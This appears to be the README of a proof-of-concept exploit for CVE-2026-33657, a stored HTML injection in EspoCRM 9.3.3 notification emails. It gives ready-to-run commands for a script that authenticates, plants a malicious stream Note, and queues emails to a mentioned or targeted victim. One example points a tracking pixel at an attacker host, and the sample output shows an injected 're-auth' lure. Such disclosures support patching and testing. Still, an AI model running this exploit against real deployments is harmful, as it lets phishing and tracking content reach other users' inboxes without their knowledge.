## https://sploitus.com/exploit?id=9CC09B00-098C-5B90-82A6-E55F0B6AEA64
# CVE-2026-33657 - EspoCRM 9.3.3 Stored HTML Injection in Email Notifications
Authenticated proof-of-concept for stored HTML injection in EspoCRM 9.3.3 email notifications.
## Summary
EspoCRM 9.3.3 renders stream-note notification emails by transforming the note body with Markdown and inserting the resulting HTML into email templates with triple braces (`{{{post}}}`). An authenticated user who can create a stream post and trigger a notification can store attacker-controlled HTML that is later rendered in the generated email body.
The exploit performs the attacker-controlled remote portion of the flow:
1. Authenticates to EspoCRM.
2. Optionally fingerprints the version with `/api/v1/App/user`.
3. Creates a malicious `Note` containing HTML.
4. Uses `--mention` or `--target-user-id` to queue a notification target.
5. Confirms the payload is stored and the notification target is present in the API response.
Email delivery occurs when EspoCRM's normal `SendEmailNotifications` job or cron processes the queued notification.
## Affected Version
- Vulnerable: EspoCRM 9.3.3
- Fixed: EspoCRM 9.3.4
- Advisory: https://github.com/espocrm/espocrm/security/advisories/GHSA-8prm-r5j9-j574
- CVE: CVE-2026-33657
- CWE: CWE-80
## Requirements
- Python 3
- `requests`
- Valid EspoCRM credentials
- Ability to create stream `Note` records
- A notification target:
- `--mention ` for mention email notifications, or
- `--target-user-id ` for targeted stream-post notifications
Install dependency:
```bash
python3 -m pip install requests
```
## Usage
Preferred mention-based path:
```bash
python3 CVE-2026-33657.py \
-u http://127.0.0.1:8083 \
-U testuser \
-P 'Admin12345!' \
--mention admin
```
Use a custom tracking URL:
```bash
python3 CVE-2026-33657.py \
-u https://target.example \
-U user \
-P 'password' \
--mention victim \
--tracking-url https://attacker.example/pixel.gif
```
Use a fully custom HTML payload:
```bash
python3 CVE-2026-33657.py \
-u https://target.example \
-U user \
-P 'password' \
--mention victim \
--payload 'open'
```
Target a specific user id instead of a mention:
```bash
python3 CVE-2026-33657.py \
-u https://target.example \
-U user \
-P 'password' \
--target-user-id 0123456789abcdef0 \
--target-user-name 'Victim User'
```
Fingerprint only, without creating a note:
```bash
python3 CVE-2026-33657.py \
-u https://target.example \
-U user \
-P 'password' \
--detect-only
```
## Options
```text
-u, --url Base EspoCRM URL
-U, --username EspoCRM username
-P, --password EspoCRM password
--mention Username to mention, without @
--target-user-id User id for targeted stream-post notifications
--target-user-name Display name for --target-user-id
--payload Raw HTML payload to store in the Note
--tracking-url Tracking pixel URL used by the default payload
--link-url Link URL used by the default payload
--marker Marker text prepended to the payload
--detect-only Fingerprint version only; do not create a Note
--skip-version-check Skip /api/v1/App/user before exploitation
--force Continue even if version fingerprint is not 9.3.3
--insecure Disable TLS certificate verification
```
## Expected Output
A successful run creates a malicious note and confirms the notification target:
```text
[*] /api/v1/App/user: HTTP 200
[*] Detected version: 9.3.3
[+] Version fingerprint is vulnerable: EspoCRM 9.3.3.
[*] Creating malicious Note as testuser
[*] Note response: HTTP 200 ...
[+] Exploit payload stored in Note post.
[+] Note id: 69fddeef8db756271
[+] Mention parsed: @admin -> user id 69fdcfb66c34ccb81
[+] Notification target list returned by API: 69fdcfb66c34ccb81
[+] Complete remote trigger submitted.
```
On a vulnerable instance, the generated HTML email body preserves the injected HTML. A lab capture looks like:
```html
re-auth
```
## Lab Verification
In a local EspoCRM lab, after running the exploit, trigger the notification job:
```bash
sudo -u www-data php command.php run-job SendEmailNotifications
```
The resulting email body should contain the injected HTML in the `text/html` part.
## Notes
- The exploit does not need shell access to the target; shell access is only useful for local lab verification of the queued email job.
- If the API reports `@@version`, the target is likely a source-tree build. The script continues because the underlying code may still be the vulnerable 9.3.3 tag.
- If `--mention` does not produce a parsed mention, check the attacker's `messagePermission` and `mentionPermission`, and confirm that the target username exists and can receive notifications.